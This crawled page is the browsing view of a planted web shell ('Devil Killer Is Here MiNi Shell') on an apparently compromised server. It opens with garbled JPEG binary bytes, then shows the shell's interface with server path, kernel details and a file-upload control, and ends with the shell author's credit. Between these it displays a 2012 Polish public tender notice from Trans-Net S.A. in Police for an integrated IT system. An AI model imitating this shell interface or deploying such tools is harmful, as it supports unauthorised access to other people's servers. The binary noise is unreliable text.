JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120919/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120919/355216-N-2012.html

<p class="kh_header"><b>Police: Dostawa i nadzór nad wdrożeniem zintegrowanego systemu informatycznego oraz konfiguracja wdrażanego oprogramowania z programem Integra -7 firmy CDS Mioduszewski  z siedzibą w Koszalinie wraz z dostawą bazy danych</b><br>
<b>Numer ogłoszenia: 355216 - 2012; data zamieszczenia: 19.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Użyteczności Publicznej "Trans-Net" S.A. , ul. Tanowska 8, 72-010 Police, woj. zachodniopomorskie, tel. 091 3121120, faks 091 3175177.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka Prawa Handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i nadzór nad wdrożeniem zintegrowanego systemu informatycznego oraz konfiguracja wdrażanego oprogramowania z programem Integra -7 firmy CDS Mioduszewski  z siedzibą w Koszalinie wraz z dostawą bazy danych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1. Przedmiotem zamówienia jest dostawa zintegrowanego systemu informatycznego  (ZSI) wykonanego w jednakowej technologii bazodanowej w tym udzielenie Zamawiającemu bezterminowej licencji na użytkowane oprogramowania , który obejmować winien minimum następujące umowne obszary funkcjonalne:

1.	Księgowość i finanse 
2.	Biuro obsługi klienta
3.	Rozliczanie  usług wywozu odpadów i pozostałych usług  w tym robót budowlanych
4.	Pozostałą sprzedaż
5.	Magazyn
6.	Ewidencję środków trwałych i wartości niematerialnych i prawnych
7.	Kadry z ewidencją czasu pracy
8.	Płace
9.	Zarządzanie obiegiem dokumentów i informacji
10.	Zestawienia analityczne dla Zarządu i Rady Nadzorczej/ analizy i planowanie /
11.	Integracja z systemem Integra - 7
 
3.2. Wraz z oprogramowaniem Dostawca zobowiązany jest do dostarczenia instrukcji obsługi w    języku polskim dla użytkowników poszczególnych modułów.

3.3. W ramach zamówienia przewiduje się wykonanie analizy przedwdrożeniowej, konwersję danych z programów dotychczas użytkowanych, instalację i konfigurację oprogramowania  na serwerze i stacjach roboczych, nadzór nad wdrożeniem, szkolenie pracowników wytypowanych do obsługi poszczególnych modułów, świadczenie usług serwisu gwarancyjnego w okresie 36 miesięcy od zakończenia wdrożenia  (w tym nieodpłatne wykonywanie poprawek celem usunięcia błędów w  zintegrowanym systemie informatycznym )

3.4.  Zamawiający zastrzega konieczność świadczenia przez dostawcę serwisu pogwarancyjnego, nadzoru autorskiego, wymiany wersji oprogramowania w przypadku zmiany uregulowań prawnych lub  jego wewnętrznych potrzeb (na podstawie odrębnej umowy).

3.5. Zintegrowany system informatyczny winien charakteryzować się następującymi cechami ogólnymi:
- jest w pełni zintegrowany i zawiera minimum umowne wymienione obszary funkcjonalne przedstawione w pkt.3.1. pkt. 1÷11 , 
- jest oparty o jednorodny system bazy danych
- spełnia wymogi polskiego prawa , jest systematycznie aktualizowany zgodnie ze zmieniającymi się przepisami  
    - pracuje w technologii klient - serwer
    - jest wyposażony w graficzny interfejs użytkownika
 - posiada rozbudowane możliwości parametryzacyjne umożliwiające dostosowanie systemu do potrzeb i specyfiki zamawiającego (w tym także możliwość samodzielnego dodawania nowych pól do bazy danych i zakładania własnych słowników systemowych przez użytkownika)
- interfejs powinien zapewnić elastyczne metody wyszukiwania danych,  sortowanie po dowolnym polu  z bazy danych 
- posiada rozbudowany system raportowania , z możliwością dowolnego  definiowania raportów  i wykonywania wszelkiego rodzaju analiz oraz możliwość ich prezentowania w formie graficznej, wymagane jest , aby wraz z systemem zostały dostarczone narzędzia umożliwiające tworzenie zestawień przez użytkowników
- współpracuje z pakietem pracy biurowej MS Office
- posiada rozbudowany system kontroli uprawnień użytkowników.

3.6. Zamawiający dla realizacji zamówienia wymaga przedstawienia w ofercie specyfikacji technicznej oprogramowania systemowego oraz bazy danych z licencjami dla planowanej ilości 15 użytkowników .

3.7. Zamawiający wymaga, aby Dostawca przeprowadził szkolenia dla użytkowników i administratorów z obsługi  zintegrowanego systemu informatycznego zapewniające jego sprawną obsługę. Liczba godzin oraz terminy szkoleń będą dopasowane do potrzeb użytkowników. Terminy szkoleń będą musiały być przystosowane do godzin pracy zamawiającego w sposób jak najmniej powodujący zakłócenia w ciągłości pracy zamawiającego. . 

3.9. Zintegrowany system informatyczny bezwzględnie winien zapewnić  potrzeby Zamawiającego w zakresie dwustronnej  wymiany ściśle zdefiniowanych informacji z klientami za pośrednictwem portalu internetowego / e - BOK /.

3.10. W planach Zamawiającego docelowo zakłada się  dopuszczalną przepisami prawa   eliminację dokumentacji w formie  papierowej.   

3.11.	 Ewentualne podane w opisach nazwy własne nie mają na celu naruszenie art. 29 i 7 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zm.), a mają jedynie za zadanie sprecyzowanie oczekiwań jakościowych                                  i technologicznych Zamawiającego. Zamawiający dopuszcza rozwiązania równoważne pod warunkiem spełnienia tego samego poziomu technologicznego, wydajnościowego                                i funkcjonalnego założonego w opisie przedmiotu zamówienia.

3.12.	Zamawiający żąda by Dostawca wskazał w ofercie część zamówienia, której wykonanie chce powierzyć podwykonawcom. Jeżeli wykonawca ma zamiar zlecić wykonanie części dostaw podwykonawcy to musi załączyć do oferty odpowiednie oświadczenie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 72.26.80.00-1, 72.26.30.00-6, 72.26.50.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 180.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Celem spełnienia warunków zawartych w art. 22 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych Wykonawca musi wykazać, iż będzie dysponował: doświadczeniem polegającym na wykonaniu w ostatnich trzech latach co najmniej jednej usługi polegającej na wdrożeniu zintegrowanego systemu informatycznego w wersji obejmującej swoim zakresem przedmiot zamówienia tj . minimalne, przewidywane obszary funkcjonalne: Księgowość i finanse, Biuro obsługi klienta, Rozliczanie  usług wywozu odpadów i pozostałych usług  w tym robót budowlanych, Pozostałą sprzedaż, Magazyn, Ewidencję środków trwałych i wartości niematerialnych i prawnych, Kadry z ewidencją czasu pracy, Płace, Zarządzanie obiegiem dokumentów i informacji, Zestawienia analityczne dla Zarządu i Rady Nadzorczej (analizy i planowanie) Zamawiający przyjmie, że warunek będzie spełniony jeśli wykonawca zrealizował przynajmniej jedno wdrożenie dotyczące w/w  minimalnych przewidywanych obszarów funkcjonalnych o wartości minimum 100 000 zł jedno wdrożenie. 
Celem wybrania wykonawców, którzy zostaną zaproszeni do składania ofert,  to jest przygotowania kolejności wykonawców umożliwiającej wybranie przewidywanych 3 wykonawców zamawiający za każde dodatkowe niż minimalne wymagane doświadczenie wykonawcy wykazane w wykazie wykonanych usług  składającego ofertę  w zakresie wdrożenia zintegrowanego systemu informatycznego w wersji obejmującej swoim zakresem w/w przedmiot zamówienia przyzna 1 punkt.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Celem spełnienia warunków zawartych w art. 22 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych Wykonawca musi wykazać, iż będzie dysponował: co najmniej dwiema osobami, które będą uczestniczyć w wykonaniu zamówienia posiadającymi doświadczenie we wdrażaniu zintegrowanego systemu informatycznego w wersji obejmującej swoim zakresem przedmiot zamówienia tj. minimalne, przewidywane obszary funkcjonalne: Księgowość i finanse, Biuro obsługi klienta, Rozliczanie  usług wywozu odpadów i pozostałych usług  w tym robót budowlanych, Pozostałą sprzedaż, Magazyn, Ewidencję środków trwałych i wartości niematerialnych i prawnych, Kadry z ewidencją czasu pracy, Płace, Zarządzanie obiegiem dokumentów i informacji, Zestawienia analityczne dla Zarządu i Rady Nadzorczej (analizy i planowanie) Zamawiający przyjmie, że warunek będzie spełniony jeśli każda z wykazanych osób zrealizowała przynajmniej jedno wdrożenie dotyczące w/w  minimalnych przewidywanych w obszarów funkcjonalnych. 
Celem wybrania wykonawców, którzy zostaną zaproszeni do składania ofert,  to jest przygotowania kolejności wykonawców umożliwiającej wybranie przewidywanych 3 wykonawców zamawiający za każde dodatkowe niż minimalne wymagane doświadczenie osób wskazanych w wykazie osób przewidywanych do realizacji zamówienia (wykazanie wdrożenia zintegrowanego systemu informatycznego w wersji obejmującej swoim zakresem w/w przedmiot zamówienia) przyzna 2 punkty</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Postępowanie jest składane w trybie negocjacji z ogłoszeniem w którym ustawodawca nie przewidział możliwości opisu formalnych druków. Wykonawca składający wniosek o dopuszczenie do udziału w postępowaniu musi  złożyć podpisany przez osobę uprawnioną wniosek, w którym określi jakiego postępowania dotyczy i załączy dokumenty wymienione w punkcie III. 4 tego ogłoszenia. Z treści złożonych dokumentów (wykazów) ma wynikać  jednoznacznie spełnienie warunków udziału w postępowania (pkt. III.3) ale także musi być możliwość obliczenia  punktów celem utworzenia kolejności wniosków dopuszczonych wykonawców (pkt IV.1.2)
1.2. Wykonawca zobowiązany jest do złożenia oświadczenia o braku podstaw do wykluczenia  z postępowania o udzielenie zamówienia -  - proponowana treść oświadczenia (jeśli wykonawca stwierdza, że jego treść jest zgodna z jego  stanem faktycznym): 
Przystępując do udziału w postępowaniu na zadanie p.n :Dostawa i nadzór nad wdrożeniem zintegrowanego systemu informatycznego oraz konfiguracja wdrażanego oprogramowania z programem Integra -7 firmy CDS Mioduszewski  z siedzibą w Koszalinie wraz z dostawą bazy danych, w związku  z art. 24 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2010 r., Nr 113, poz. 759 z późn. zm.) oświadczam(y), że nie podlegam(y) wykluczeniu z przedmiotowego postępowania na podstawie przesłanek zachodzących w w/w przepisach.
 (W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przy dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich). 

Podpis osoby upoważnionej
1.2.  Wykonawca zobowiązany jest do złożenia oświadczenia o spełnianiu warunków udziału    w postępowaniu określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych
 - proponowana treść oświadczenia (jeśli wykonawca stwierdza, że jego treść jest zgodna z jego  stanem faktycznym): 
Przystępując do udziału w postępowaniu na zadanie p.n. /Dostawa i nadzór nad wdrożeniem zintegrowanego systemu informatycznego oraz konfiguracja wdrażanego oprogramowania z programem Integra -7 firmy CDS Mioduszewski  z siedzibą w Koszalinie wraz z dostawą bazy danych/ w związku  z art. 22 ust. 1 pkt 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2010 r., Nr 113, poz. 759   z późn. zm.) oświadczam(y), że spełniam(y) n/w warunki udziału w postępowaniu o udzielenie zamówienia publicznego dotyczące: 
1.        posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania; 2.        posiadania wiedzy i doświadczenia; 3.        dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia; 4.        sytuacji ekonomicznej i finansowej.
Podpis osoby upoważnionej</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> negocjacje z ogłoszeniem.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 3.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>1.	Celem wybrania wykonawców, którzy zostaną zaproszeni do składania ofert,  to jest przygotowania kolejności wykonawców umożliwiającej wybranie przewidywanych 3 wykonawców zamawiający za każde dodatkowe niż minimalne wymagane doświadczenie wykonawcy wykazane w wykazie wykonanych usług  składającego ofertę  w zakresie wdrożenia zintegrowanego systemu informatycznego w wersji obejmującej swoim zakresem w/w przedmiot zamówienia przyzna 1 punkt.

2.	Celem wybrania wykonawców, którzy zostaną zaproszeni do składania ofert,  to jest przygotowania kolejności wykonawców umożliwiającej wybranie przewidywanych 3 wykonawców zamawiający za każde dodatkowe niż minimalne wymagane doświadczenie osób wskazanych w wykazie osób przewidywanych do realizacji zamówienia (wykazanie wdrożenia zintegrowanego systemu informatycznego w wersji obejmującej swoim zakresem w/w przedmiot zamówienia) przyzna 2 punkty</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. 

a) zmiana wartości zamówienia z uwagi na zmianę stawki VAT

-	jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT zapłaconego przez wykonawcę, 
-	jeśli zmiana stawki VAT będzie powodować zmniejszenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT do zapłacenia przez wykonawcę,

b)	rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone.

16.2.1. Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zm.):
a)	zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy (np. zmiana               nr rachunku bankowego), 
b)	zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów miedzy Stronami,
c)	udzielenie zamówień dodatkowych określonych w przepisach o zamówieniach publicznych,
d)	udzielenie zamówień uzupełniających w zakresie wskazanym w specyfikacji istotnych warunków zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> nie dotyczy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.09.2012 godzina 10:00, miejsce: Przedsiębiorstwo Użyteczności Publicznej  TRANS-NET Spółka Akcyjna , 72-010 Police, ul. Tanowska 8, sekretariat, pokój nr 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com